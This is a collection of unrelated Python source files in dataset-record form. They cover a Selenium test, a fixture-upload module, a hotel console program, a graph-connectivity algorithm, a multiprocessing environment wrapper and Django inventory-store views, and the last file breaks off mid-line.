+{"seq_id":"488598364","text":"\n\nfrom xai.brain.wordbase.nouns._roan import _ROAN\n\n#calss header\nclass _ROANS(_ROAN, ):\n\tdef __init__(self,): \n\t\t_ROAN.__init__(self)\n\t\tself.name = \"ROANS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"roan\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_roans.py","file_name":"_roans.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"357077486","text":"'''\nCreated on 30-Nov-2015\n\n@author: radhika.goel\n'''\nimport unittest\nfrom selenium import webdriver\nclass SearchTests(unittest.TestCase):\n \n def setUp(self):\n # create a new Firefox session\n self.driver = webdriver.Firefox()\n self.driver.implicitly_wait(30)\n self.driver.maximize_window()\n # navigate to the application home page\n self.driver.get(\"http://demo.magentocommerce.com/\")\n \n def test_search_by_category(self):\n # get the search textbox\n self.search_field = self.driver.find_element_by_xpath(\"//div[@id=\\\"ab-search\\\"]\")\n self.search_field.clear()\n #//div[@id=\\\"Navigation\\\"]/descendant::span[text()='Matrices']\n # enter search keyword and submit\n self.search_field.send_keys(\"Mobile Phones\")\n self.search_field.submit()\n \n self.phones = self.driver.find_elements_by_xpath(\"//a[@href=\\\"http://www.magentocommerce.com/magento-connect/mobile-phones-responsive-theme-for-computers-electronics-mobile-stores.html\\\"]\")\n self.phones.submit()\n \n \n def tearDown(self):\n self.driver.quit()\n \nif __name__ == '__main__':\n unittest.main(verbosity=2)","sub_path":"PyWork/UnitTestFrameworkWithSelenium/src/test/searchCategory.py","file_name":"searchCategory.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"449702345","text":"from couchdbkit import ResourceNotFound\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext as _\nfrom corehq.apps.fixtures.exceptions import ExcelMalformatException, FixtureUploadError, \\\n FixtureAPIException, DuplicateFixtureTagException\nfrom corehq.apps.fixtures.models import FixtureDataType, FieldList, FixtureItemField, \\\n FixtureDataItem\nfrom corehq.apps.fixtures.utils import get_fields_without_attributes\nfrom corehq.util.soft_assert import soft_assert\nfrom corehq.util.spreadsheets.excel import WorksheetNotFound\nfrom .upload import DELETE_HEADER, FixtureUploadResult, \\\n get_memoized_location, FAILURE_MESSAGES, get_workbook\nfrom corehq.apps.users.models import CommCareUser\nfrom corehq.apps.users.util import normalize_username\nfrom dimagi.utils.couch.bulk import CouchTransaction\nfrom soil import DownloadBase\n\n\ndef run_upload(domain, workbook, replace=False, task=None):\n from corehq.apps.users.bulkupload import GroupMemoizer\n return_val = FixtureUploadResult()\n group_memoizer = GroupMemoizer(domain)\n get_location = get_memoized_location(domain)\n\n with CouchTransaction() as transaction:\n type_sheets = workbook.get_all_type_sheets()\n total_tables = len(type_sheets)\n return_val.number_of_fixtures = total_tables\n\n def _update_progress(table_count, item_count, items_in_table):\n if task:\n processed = table_count * 10 + (10. * item_count / items_in_table)\n DownloadBase.set_progress(task, processed, 10 * total_tables)\n\n for table_number, table_def in enumerate(type_sheets):\n tag = table_def.table_id\n new_data_type = FixtureDataType(\n domain=domain,\n is_global=table_def.is_global,\n tag=tag,\n fields=table_def.fields,\n item_attributes=table_def.item_attributes\n )\n try:\n tagged_fdt = FixtureDataType.fixture_tag_exists(domain, tag)\n if tagged_fdt:\n data_type = tagged_fdt\n # support old usage with 'UID'\n elif table_def.uid:\n data_type = FixtureDataType.get(table_def.uid)\n else:\n data_type = new_data_type\n\n if replace and data_type != new_data_type:\n data_type.recursive_delete(transaction)\n data_type = new_data_type\n\n data_type.fields = table_def.fields\n data_type.item_attributes = table_def.item_attributes\n data_type.is_global = table_def.is_global\n assert data_type.doc_type == FixtureDataType._doc_type\n if data_type.domain != domain:\n data_type = new_data_type\n return_val.errors.append(\n _(\"'%(UID)s' is not a valid UID. But the new type is created.\")\n % {'UID': table_def.uid}\n )\n if table_def.delete:\n data_type.recursive_delete(transaction)\n continue\n except (ResourceNotFound, KeyError):\n data_type = new_data_type\n transaction.save(data_type)\n\n data_items = list(workbook.get_data_sheet(data_type.tag))\n items_in_table = len(data_items)\n for sort_key, di in enumerate(data_items):\n _update_progress(table_number, sort_key, items_in_table)\n type_fields = data_type.fields\n item_fields = {}\n for field in type_fields:\n # if field doesn't have properties\n if len(field.properties) == 0:\n item_fields[field.field_name] = FieldList(\n field_list=[FixtureItemField(\n # using unicode here, to cast ints, and multi-language strings\n field_value=unicode(di['field'][field.field_name]),\n properties={}\n )]\n )\n else:\n field_list = []\n field_prop_combos = di['field'][field.field_name]\n prop_combo_len = len(field_prop_combos)\n prop_dict = di[field.field_name]\n for x in range(0, prop_combo_len):\n fix_item_field = FixtureItemField(\n field_value=unicode(field_prop_combos[x]),\n properties={prop: unicode(prop_dict[prop][x]) for prop in prop_dict}\n )\n field_list.append(fix_item_field)\n item_fields[field.field_name] = FieldList(\n field_list=field_list\n )\n\n item_attributes = di.get('property', {})\n new_data_item = FixtureDataItem(\n domain=domain,\n data_type_id=data_type.get_id,\n fields=item_fields,\n item_attributes=item_attributes,\n sort_key=sort_key\n )\n try:\n if di['UID'] and not replace:\n old_data_item = FixtureDataItem.get(di['UID'])\n else:\n old_data_item = new_data_item\n pass\n old_data_item.fields = item_fields\n old_data_item.item_attributes = item_attributes\n if old_data_item.domain != domain \\\n or not old_data_item.data_type_id == data_type.get_id:\n old_data_item = new_data_item\n return_val.errors.append(\n _(\"'%(UID)s' is not a valid UID. But the new item is created.\")\n % {'UID': di['UID']}\n )\n assert old_data_item.doc_type == FixtureDataItem._doc_type\n if di[DELETE_HEADER] == \"Y\" or di[DELETE_HEADER] == \"y\":\n old_data_item.recursive_delete(transaction)\n continue\n except (ResourceNotFound, KeyError):\n old_data_item = new_data_item\n transaction.save(old_data_item)\n\n old_groups = old_data_item.groups\n for group in old_groups:\n old_data_item.remove_group(group)\n old_users = old_data_item.users\n for user in old_users:\n old_data_item.remove_user(user)\n old_locations = old_data_item.locations\n for location in old_locations:\n old_data_item.remove_location(location)\n\n for group_name in di.get('group', []):\n group = group_memoizer.by_name(group_name)\n if group:\n old_data_item.add_group(group, transaction=transaction)\n else:\n return_val.errors.append(\n _(\"Unknown group: '%(name)s'. But the row is successfully added\")\n % {'name': group_name}\n )\n\n for raw_username in di.get('user', []):\n try:\n username = normalize_username(str(raw_username), domain)\n except ValidationError:\n return_val.errors.append(\n _(\"Invalid username: '%(name)s'. Row is not added\")\n % {'name': raw_username}\n )\n continue\n user = CommCareUser.get_by_username(username)\n if user:\n old_data_item.add_user(user)\n else:\n return_val.errors.append(\n _(\"Unknown user: '%(name)s'. But the row is successfully added\")\n % {'name': raw_username}\n )\n\n for name in di.get('location', []):\n location_cache = get_location(name)\n if location_cache.is_error:\n return_val.errors.append(location_cache.message)\n else:\n old_data_item.add_location(location_cache.location,\n transaction=transaction)\n\n return return_val\n\n\ndef _diff_lists(list_a, list_b):\n set_a = set(list_a)\n set_b = set(list_b)\n not_in_b = set_a.difference(set_b)\n not_in_a = set_b.difference(set_a)\n return sorted(not_in_a), sorted(not_in_b)\n\n\ndef validate_fixture_upload(workbook):\n\n try:\n type_sheets = workbook.get_all_type_sheets()\n except DuplicateFixtureTagException as e:\n return [e.message]\n except ExcelMalformatException as e:\n return e.errors\n\n error_messages = []\n\n for table_number, table_def in enumerate(type_sheets):\n tag = table_def.table_id\n fields = table_def.fields\n item_attributes = table_def.item_attributes\n try:\n data_items = workbook.get_data_sheet(tag)\n except WorksheetNotFound:\n error_messages.append(_(FAILURE_MESSAGES['type_has_no_sheet']).format(type=tag))\n continue\n\n try:\n data_item = iter(data_items).next()\n except StopIteration:\n continue\n else:\n # Check that type definitions in 'types' sheet vs corresponding columns in the item-sheet MATCH\n item_fields_list = data_item['field'].keys() if 'field' in data_item else []\n not_in_sheet, not_in_types = _diff_lists(item_fields_list, get_fields_without_attributes(fields))\n for missing_field in not_in_sheet:\n error_messages.append(\n _(FAILURE_MESSAGES[\"has_no_field_column\"])\n .format(tag=tag, field=missing_field))\n for missing_field in not_in_types:\n error_messages.append(\n _(FAILURE_MESSAGES[\"has_extra_column\"])\n .format(tag=tag, field=missing_field))\n\n # check that this item has all the properties listed in its 'types' definition\n item_attributes_list = data_item['property'].keys() if 'property' in data_item else []\n not_in_sheet, not_in_types = _diff_lists(item_attributes_list, item_attributes)\n for missing_field in not_in_sheet:\n error_messages.append(\n _(FAILURE_MESSAGES[\"has_no_field_column\"])\n .format(tag=tag, field=missing_field))\n for missing_field in not_in_types:\n error_messages.append(\n _(FAILURE_MESSAGES[\"has_extra_column\"])\n .format(tag=tag, field=missing_field))\n\n # check that properties in 'types' sheet vs item-sheet MATCH\n for field in fields:\n if len(field.properties) > 0:\n sheet_props = data_item.get(field.field_name, {})\n if not isinstance(sheet_props, dict):\n error_messages.append(\n _(FAILURE_MESSAGES[\"invalid_field_syntax\"])\n .format(tag=tag, field=field.field_name))\n continue\n sheet_props_list = sheet_props.keys()\n type_props = field.properties\n not_in_sheet, not_in_types = _diff_lists(sheet_props_list, type_props)\n for missing_property in not_in_sheet:\n error_messages.append(\n _(FAILURE_MESSAGES[\"sheet_has_no_property\"])\n .format(tag=tag, property=missing_property, field=field.field_name))\n for missing_property in not_in_types:\n error_messages.append(\n _(FAILURE_MESSAGES[\"sheet_has_extra_property\"])\n .format(tag=tag, property=missing_property, field=field.field_name))\n # check that fields with properties are numbered\n if type(data_item['field'][field.field_name]) != list:\n error_messages.append(\n _(FAILURE_MESSAGES[\"invalid_field_with_property\"])\n .format(field=field.field_name))\n field_prop_len = len(data_item['field'][field.field_name])\n for prop in sheet_props:\n if type(sheet_props[prop]) != list:\n error_messages.append(\n _(FAILURE_MESSAGES[\"invalid_property\"])\n .format(field=field.field_name, prop=prop))\n if len(sheet_props[prop]) != field_prop_len:\n error_messages.append(\n _(FAILURE_MESSAGES[\"wrong_field_property_combos\"])\n .format(field=field.field_name, prop=prop))\n return error_messages\n\n\ndef do_fixture_upload(domain, file_ref, replace, task=None):\n workbook = get_workbook(file_ref.get_filename())\n try:\n return run_upload(domain, workbook, replace=replace, task=task)\n except WorksheetNotFound as e:\n raise FixtureUploadError(\n _(\"Workbook does not contain a sheet called '%(title)s'\")\n % {'title': e.title})\n except ExcelMalformatException as e:\n raise FixtureUploadError(\n _(\"Uploaded excel file has following formatting-problems: '%(e)s'\")\n % {'e': '\\n'.join(e.errors)})\n except FixtureAPIException as e:\n raise FixtureUploadError(unicode(e))\n except Exception:\n soft_assert('@'.join(['droberts', 'dimagi.com'])).call(\n False, 'Unknown fixture upload exception',\n {'filename': file_ref.get_filename()}\n )\n raise FixtureUploadError(_(\"Fixture upload failed for some reason and we have noted this failure. \"\n \"Please make sure the excel file is correctly formatted and try again.\"))\n\n\ndef safe_fixture_upload(domain, file_ref, replace, task=None):\n try:\n return do_fixture_upload(domain, file_ref, replace, task)\n except FixtureUploadError as e:\n result = FixtureUploadResult()\n result.success = False\n result.errors.append(unicode(e))\n return result\n","sub_path":"corehq/apps/fixtures/upload/run_upload.py","file_name":"run_upload.py","file_ext":"py","file_size_in_byte":14762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"174612641","text":"\n\n\nhotel = {\n '1': {\n '101': ['George Jefferson', 'Wheezy Jefferson'],\n '105':['Jon', 'Jonathan', 'Johnny'],\n },\n '2': {\n '237': ['Jack Torrance', 'Wendy Torrance'],\n },\n '3': {\n '333': ['Neo', 'Trinity', 'Morpheus']\n },\n '4': {\n '444': ['Mitchell', 'Morgan', 'Xander']\n },\n '5': {\n '533': ['Anne', 'James', 'Elliot', 'Jonathan']\n }\n}\n\n\ndef greeting():\n front_desk = input(\"Welcome to the Python Hotel.\\nWould you like to:\\n1. check-in \\n2. check out\\n3. list of guests\\n4. exit?\\n\")\n\n while front_desk == \"check in\" or front_desk == \"1\":\n floor = input(\"What is your floor number [1-5]? \")\n room = input(\"What is your room number? \")\n \n if hotel.get(floor) != None and hotel.get(floor).get(room) != None:\n print(\"That room is taken, please choose another room.\")\n \n else:\n print(\"Great, welcome to the hotel.\")\n occupants = int(input(\"How many occupants do you have? \"))\n count = 0\n occupant_list = []\n while count < occupants:\n names = input(str(count+1) + \" Occupant's Name: \")\n occupant_list.append(names)\n count+=1\n hotel[floor][room] = occupant_list\n print(hotel[floor][room])\n front_desk = None\n greeting()\n \n while front_desk == \"check out\" or front_desk == \"2\":\n floor = input(\"What is your floor number? \")\n room = input(\"What is your room number? \")\n if hotel.get(floor).get(room) != None:\n hotel[floor][room] = None\n print(\"\\nThank you for staying with us.\\n\")\n print(\"Floor \", floor,\"\\tRoom \", room,\":\\t\", hotel[floor][room], \"\\n\")\n #print(\"\\t\\t\\t\", hotel[floor][room])\n front_desk = None\n greeting()\n else:\n print(\"That room is not occupied, please enter your room number.\")\n\n if front_desk == \"list\" or front_desk == \"3\":\n list_criteria = input(\"Please enter a floor number or 'all' for all current guests: \")\n if list_criteria == 'all':\n print(\"Here's a list of our current guests:\")\n for key, value in hotel.items():\n indent = 0\n print(\"Floor \" + key + \":\")\n for values, names in value.items():\n print(\"\\t\\t\", \"Room: \", values)\n for name in names:\n print(\"\\t\\t\\t\", name)\n #print(\"\\t\\t\\t\" + names)\n front_desk = None\n greeting()\n else:\n print(\"Here's a list of our current guests on Floor \" + list_criteria + \":\")\n for key, value in hotel[list_criteria].items():\n print(\"\\t\", \"Room \", key)\n for names in value:\n print(\"\\t\\t\\t\", names)\n front_desk = None\n greeting()\n else:\n return\n \n\n \ngreeting()","sub_path":"hotel1.py","file_name":"hotel1.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"96688270","text":"\n# Checks the classification of the ab initio materials science methods, done by parser,\n# currently considers DFT XC treatment,\n# however extends it with the post-Hartree-Fock methods\n# Author: Evgeny Blokhin\n\n__order__ = 4\n\nxc_types = [ # see hierarchy values in the file init-data.sql\n 0x1, 0x2, 0x3, 0x4, # main types of the Jacob's ladder, http://dx.doi.org/10.1063/1.1904565\n 0x5, 0x6, 0x7, # Hartree-Fock, +U, vdW\n]\n\ndef classify(tilde_obj):\n for i in tilde_obj.info['H_types']:\n if not i in xc_types: raise RuntimeError(\"Unknown xc type: %s (maybe typo?)\" % i)\n\n return tilde_obj\n","sub_path":"tilde/classifiers/xc_treatment.py","file_name":"xc_treatment.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"522015402","text":"# Vectorize the environment to enable multiprocessing the environment rollout\n# Try to increase training efficiency when the training is having a bottleneck in environment rollout\n# Code does not include the tensorflow graph: separate algorithm is require to generate the action.\n# If not provided, it will use random action.\n# Source : https://github.com/openai/baselines/tree/master/baselines/a2c\n\n# This class is to run multiple environments at the same time.\n\nfrom multiprocessing import Process, Pipe\nimport numpy as np\n\ndef worker(remote, env_wrapper, map_size, policy_red):\n env = env_wrapper\n policy_red = policy_red\n map_size = map_size\n while True:\n cmd, data = remote.recv()\n if cmd == 'step':\n if done:\n remote.send((ob, reward, done))\n else:\n ob, reward, done, _ = env.step(data)\n #if done:\n # ob = env.reset(map_size=MAP_SIZE, policy_red=policy_red)\n ob = env._env # comment this line to make partial observable\n remote.send((ob, reward, done))\n elif cmd == 'reset':\n done = False\n ob = env.reset(map_size=map_size, policy_red=policy_red.PolicyGen(env.get_map, env.get_team_red))\n ob = env._env\n remote.send((ob, env.get_team_blue))\n elif cmd == 'close':\n remote.close()\n break\n elif cmd == 'won':\n remote.send(env.blue_win)\n elif cmd == 'render':\n pass\n elif cmd == 'renew':\n # renew weight of the policy\n # policy must support reset weight method\n policy_red.reset_network()\n elif cmd == 'change_red_policy':\n # Change policy of red with given data\n policy_red=data\n elif cmd == 'change_mapsize':\n # Change map_size\n map_size=data\n else:\n raise NotImplementedError\n\nclass SubprocVecEnv:\n # Subprocess Vector Environment\n # https://github.com/openai/baselines/tree/master/baselines/a2c (source)\n # with some modificatoins\n def __init__(self, nenvs, env_fns, map_size, initial_reds):\n self.nenvs = nenvs\n \n self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])\n self.ps = [Process(target=worker, args=(self.work_remotes[idx], env_fns[idx], map_size, initial_reds[idx]))\n for idx in range(nenvs)]\n for pidx, p in enumerate(self.ps):\n p.start()\n print(f\"Process {pidx} Initiated\")\n\n def step(self, actions):\n for remote, action in zip(self.remotes, actions):\n remote.send(('step', action))\n results = [remote.recv() for remote in self.remotes]\n obs, rews, dones = zip(*results)\n return np.stack(obs), np.stack(rews), np.stack(dones)\n\n def reset(self):\n for remote in self.remotes:\n remote.send(('reset', None))\n results = [remote.recv() for remote in self.remotes]\n obs, team = zip(*results)\n return np.stack(obs), np.stack(team)\n \n def won(self):\n for remote in self.remotes:\n remote.send(('won', None))\n results = [remote.recv() for remote in self.remotes]\n return np.stack(results)\n\n def close(self):\n for remote in self.remotes:\n remote.send(('close', None))\n for p in self.ps:\n p.join()\n \n def change_red_policy(self, policy):\n for remote in self.remotes:\n remote.send(('change_red_policy', policy))\n \n def change_mapsize(self, ms):\n for remote in self.remotes:\n remote.send(('change_mapsize', ms))\n\n def render(self):\n for remote in self.remotes:\n remote.send(('render', None))\n\n @property\n def num_envs(self):\n return len(self.remotes)","sub_path":"utility/vectorEnv.py","file_name":"vectorEnv.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"240486022","text":"import os\nfrom errors.bundledoesnotexistserror import BundleDoesNotExistsError\n\nSLASH = \"/\"\nTEMPLATES = \"templates\"\nROOT_PATH = os.path.dirname(os.path.abspath(__file__)) + \"/../\"\nBUNDLES = \"bundles\"\nBUNDLE_LOCATION = \"/../bundles/\"\nBUNDLE_SETTINGS = \"/settings.py\"\nCONTROLLER_PATH = \"/controllers/\"\nCONTROLLER_TEMPLATE = \"controller.tem\"\nCONTROLLER_TEMPLATE_PATH = ROOT_PATH + TEMPLATES + SLASH + BUNDLES + SLASH + CONTROLLER_TEMPLATE\n\nclass ControllerManager(object):\n\n @classmethod\n def create(cls, controller_name, bundle_name):\n cls._create_controller_file(bundle_name, controller_name)\n cls._create_controller_setting(bundle_name, controller_name)\n\n @classmethod\n def _create_controller_setting(cls, bundle_name, controller_name):\n bundle_path = cls._get_bundle_path(bundle_name)\n import_entry = \"from bundles.%s.controllers.%s import %s\\n\" % (bundle_name, controller_name.lower(),\n controller_name)\n\n controller_entry = \" (%s, \\\"/%s\\\", \\\"/%s/\\\"),\\n\" % (controller_name, controller_name.lower(),\n controller_name.lower().\n replace(\"controller.tem\", \"\"))\n\n with open(bundle_path + BUNDLE_SETTINGS, \"r\") as settings_file:\n new_lines = list()\n lines = settings_file.readlines()\n new_lines.append(import_entry)\n for line in lines:\n if \"CONTROLLERS = [\" in line:\n new_lines.append(\"CONTROLLERS = [\\n\" + controller_entry)\n else:\n new_lines.append(line)\n\n with open(bundle_path + BUNDLE_SETTINGS, \"w\") as settings_file:\n settings_file.writelines(new_lines)\n\n @classmethod\n def _create_controller_file(cls, bundle_name, controller_name):\n bundle_path = cls._get_bundle_path(bundle_name)\n controller_file = open(bundle_path + CONTROLLER_PATH + controller_name.lower() + \".py\", \"w+\")\n with open(CONTROLLER_TEMPLATE_PATH, \"r\") as template_file:\n controller_file.write(template_file.read() % (bundle_name, controller_name, controller_name))\n controller_file.close()\n\n\n @staticmethod\n def _get_bundle_path(bundle_name):\n file_path = os.path.abspath((os.path.dirname(__file__) + BUNDLE_LOCATION + bundle_name))\n if not os.path.isdir(file_path):\n raise BundleDoesNotExistsError(bundle_name)\n return file_path","sub_path":"managers/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"33513335","text":"from course_2.common.DirectedGraph import DirectedGraph\nfrom course_2.common.GraphCreator import create_graph_with_sccs\nfrom course_2.common.Vertex import Vertex\n\nnum_vertices_processed = 0 # t, used in dfs_loop first pass\ncurrent_source_vertex = None # s, used in dfs_loop second pass\n\n\ndef reverse_graph_edges(graph: DirectedGraph) -> DirectedGraph:\n \"\"\"\n Creates a copy of the input graph with all edges reversed\n :param graph: Input graph to make copy from\n :return: Reversed Graph\n \"\"\"\n reversed_graph = DirectedGraph()\n\n for vertex in graph.vertices:\n reversed_graph.add_vertex(vertex_id=vertex.id,\n finishing_time=vertex.finishing_time)\n\n for edge in graph.edges:\n reversed_graph.add_edge(edge_id=edge.id,\n head_id=edge.tail.id,\n tail_id=edge.head.id)\n\n return reversed_graph\n\n\ndef dfs_loop(graph: DirectedGraph):\n # Graph is sorted by finishing time increasing on second pass\n for vertex in graph.vertices:\n if not vertex.explored:\n global current_source_vertex\n current_source_vertex = vertex\n\n depth_first_search(vertex)\n\n return graph\n\n\ndef depth_first_search(vertex: Vertex):\n vertex.set_explored()\n\n global current_source_vertex\n vertex.leader = current_source_vertex\n\n for edge in vertex.edges:\n if not edge.head.explored:\n depth_first_search(edge.head)\n\n global num_vertices_processed\n num_vertices_processed = num_vertices_processed + 1\n\n vertex.finishing_time = num_vertices_processed\n\n\ndef compute_connectivity(graph: DirectedGraph):\n \"\"\"\n Implementation of Kosaraju's Two-Pass Algorithm to find strongly connected\n components (SCCs)\n - O(num_edges + num_vertices) time complexity\n - Performed using two depth-first searches.\n This will add a leader value for each vertex in the graph, vertices with\n the same leader are part of the same SCC\n :param graph:\n :return: graph with leaders in vertices\n \"\"\"\n reversed_graph = reverse_graph_edges(graph)\n reversed_graph = dfs_loop(reversed_graph)\n\n fixed_graph = reverse_graph_edges(reversed_graph)\n fixed_graph.sort_on_finishing_times()\n second_pass = dfs_loop(fixed_graph)\n\n return second_pass\n\n\nif __name__ == '__main__':\n directed_graph = create_graph_with_sccs()\n\n directed_graph = compute_connectivity(directed_graph)\n\n for vertex in directed_graph.vertices:\n print(f'Vertex {vertex.id} has leader {vertex.leader.id}')\n","sub_path":"course_2/depth_first_search/ComputeDirectedGraphConnectivity.py","file_name":"ComputeDirectedGraphConnectivity.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"6672914","text":"import matplotlib.pyplot as plt\n\nclass mplHelper:\n\t\"\"\"\n\tSilly little helper to set nice things about matplotlib plots so I don't have to type it every time.\n\t\"\"\"\n\t@classmethod\n\tdef initializeMpl(cls):\n\t\tparams = {'text.usetex': False, 'mathtext.fontset': 'dejavusans','font.size':14}\n\t\tplt.rcParams.update(params) \n\n\t@classmethod\n\tdef mySave(cls,flName):\n\t\tplt.savefig(flName,dpi=500,bbox_inches='tight')\n\n\t@classmethod\n\tdef hist1D(cls,thing,bins,range,weights,normed=True,save='histPlot'):\n\t\t\"\"\"\n\t\t@param thing:\n\t\t@param bins:\n\t\t@param range:\n\t\t@param weights:\n\t\t@param normed:\n\t\t@param save: String that, if empty, will just plot the figure, meaning you can plot more than one.\n\t\t\"\"\"\n\t\timport numpy as np\n\t\txx,yy = np.histogram(thing,bins=bins,range=range,weights=weights,density=normed)\n\t\txx = 0.5*(xx[1:]+xx[:-1])\n\t\tplt.plot(xx,yy,'k')\n\t\tif save:\n\t\t\tmplHelper.mySave(save)","sub_path":"mplHelper.py","file_name":"mplHelper.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"63945249","text":"from itertools import count\nimport json\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.db.models import Q\n# Create your views here.\nfrom main_store.models import ProductStore, ProductIssue, ProductCodeName, MaterialList, BinCardInfo, MaterialQuality, \\\n MrrIssue, QualityItemList, JobNumber, Indent, IndentMaterials\nfrom main_store.form import ProductIssueForm, ProductStoreForm, MaterialListForm, MrrIssueForm, MaterialQualityForm, \\\n QualityItemListForm, IndentForm, IndentMaterialsForm\nfrom datetime import date, datetime\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# Create your views here.\n@login_required(login_url='login')\ndef home_store(request):\n user_name = \"প্রধান ভাণ্ডার\"\n context = {\n 'user_name': user_name,\n\n }\n return render(request, \"home/main_store.html\", context)\n\n\n@login_required(login_url='login')\ndef mrr_compose(request):\n submitted = False\n submitted1 = False\n target_item_query = None\n if request.method == 'POST':\n if '_save' in request.POST:\n mrr_no = request.POST.get('mrr_no')\n form = MaterialListForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n submitted = True\n print(\"Data Save material list!\")\n target_item_query = MaterialList.objects.filter(Q(mrr_no=mrr_no))\n else:\n print('form not valid!')\n if request.method == 'POST':\n if '_save1' in request.POST:\n form = MrrIssueForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n submitted1 = True\n print(\"Data Save in MRR Form.\")\n else:\n print('form not valid!')\n\n context = {\n 'target_item_query': target_item_query,\n 'submitted': submitted,\n 'submitted1': submitted1,\n }\n return render(request, \"main_store/mrr_form.html\", context)\n\n\ndef mrr_no_receive(request):\n if request.method == 'POST':\n if '_search' in request.POST:\n target_mrr_no = request.POST.get('mrr_no_search')\n print(target_mrr_no)\n return redirect('mrr_show', mrr_no=target_mrr_no)\n\n context = {\n\n }\n return render(request, \"main_store/mrr_search_form.html\", context)\n\n\ndef mrr_show(request, mrr_no):\n target_mrr_no = mrr_no\n target_mrr = MrrIssue.objects.get(mrr_no=target_mrr_no)\n target_material_list = MaterialList.objects.filter(mrr_no=target_mrr_no)\n context = {\n 'target_mrr': target_mrr,\n 'target_material_list': target_material_list,\n }\n return render(request, \"main_store/mrr_show.html\", context)\n\n\n# search using ajax start\ndef post_ajax(request):\n search = False\n if request.method == \"POST\":\n search_text = request.POST['search_text']\n search = True\n else:\n search_text = ''\n search_res = ProductStore.objects.filter(code=search_text)\n context = {\n 'search_res': search_res,\n 'search': search\n }\n return render(request, \"main_store/mrr_form.html\", context) # need output as render for csrf token show!\n\n\n# render_to_reponse did not show csrf token, need jquery min version not slim version. slim verson not working.\n\n\ndef ajax_search(request):\n search = False\n if request.is_ajax():\n search_text = request.POST['search_text']\n search = True\n else:\n search_text = ''\n search_res = ProductCodeName.objects.get(code=search_text)\n print(search_res)\n\n context = {\n 'search_res': search_res,\n 'search': search,\n }\n return render(request, 'main_store/ajax_search.html', context)\n\n\n# search using ajax end here...........\n\n\ndef job_number(request): # Job Number & name show in dropdown list.\n all_job = JobNumber.objects.all()\n job_nam = ''\n for job in all_job: # Add job Number after job name in job name row.\n if job.job_type == \"Repair\":\n job_no = job.job_no\n job_nam = job.job_name + \" \" + job_no\n job.job_name = job_nam\n job.save()\n print(job_nam)\n context = {\n 'all_job': all_job\n }\n return render(request, \"main_store/indent_form.html\", context)\n\n\n@login_required(login_url='login')\ndef product_issue(request):\n form = None\n popup = False\n submitted = False\n p_job = ''\n before_issue = ''\n balance_low = ''\n all_job = JobNumber.objects.all()\n if request.method == 'POST':\n if '_save' in request.POST:\n p_code = request.POST.get('item_code')\n p_job = request.POST.get('job_no')\n p_quantity = request.POST.get('item_quantity')\n form = ProductIssueForm(request.POST, request.FILES)\n target_item_query = BinCardInfo.objects.filter(Q(item_code=p_code))\n print(target_item_query)\n if target_item_query:\n if form.is_valid():\n instance = form.save(commit=False)\n for target_item in target_item_query:\n before_issue = target_item.balance\n print(target_item.balance)\n if float(before_issue) > 0 and float(before_issue) >= float(p_quantity):\n target_item.balance = float(target_item.balance) - float(p_quantity)\n target_item.save()\n after_issue = target_item.balance\n instance.qty_befr_issue = before_issue\n instance.qty_after_issue = after_issue\n instance.save()\n submitted = True\n print(\"Issue & deduction OK\")\n else:\n balance_low = \"This Product Not Available or product available but less than your\" \\\n \" requirement\"\n\n else:\n print(\"Form is not Valid\")\n\n else:\n popup = True\n print(\"Product not found\")\n context = {\n 'form': form,\n 'submitted': submitted,\n 'popup': popup,\n 'p_job': p_job,\n 'balance_low': balance_low,\n 'before_issue': before_issue,\n 'all_job': all_job\n }\n return render(request, \"main_store/product_issue_form.html\", context)\n\n\n@login_required(login_url='login')\ndef product_store(request):\n submitted = False\n error_msg = \"\"\n p_code = \"\"\n if request.method == 'POST':\n if '_save' in request.POST:\n p_code = request.POST.get('item_code')\n target_item_p_store = ProductStore.objects.filter(Q(item_code=p_code))\n # code.\n if target_item_p_store:\n error_msg = \"This Product Code Already Exits. Try new code!\"\n else:\n form = ProductStoreForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n submitted = True\n print(\"Save is OK\")\n else:\n print(\"Form is not Valid\")\n # This code below for product save to product name and code table.\n form2 = ProductCodeName()\n try:\n target_item_p_name = ProductCodeName.objects.get(Q(code=p_code)) # Item Target in Product name &\n if target_item_p_name:\n target_item_p_name.location = request.POST.get('item_location')\n target_item_p_name.min_balance = request.POST.get('min_balance')\n target_item_p_name.item_picture = request.FILES.get('item_picture')\n target_item_p_name.save()\n except ObjectDoesNotExist:\n form2.code = request.POST.get('item_code')\n form2.name = request.POST.get('item_name')\n form2.item_unit = request.POST.get('item_unit')\n form2.location = request.POST.get('item_location')\n form2.min_balance = request.POST.get('min_balance')\n form2.item_picture = request.FILES.get('item_picture')\n form2.item_under_group = request.POST.get('item_group')\n form2.save()\n print(\"Product Name and code save.\")\n # Bin Card table data inserted here...\n bincard_form = BinCardInfo()\n bincard_form.ref_no = 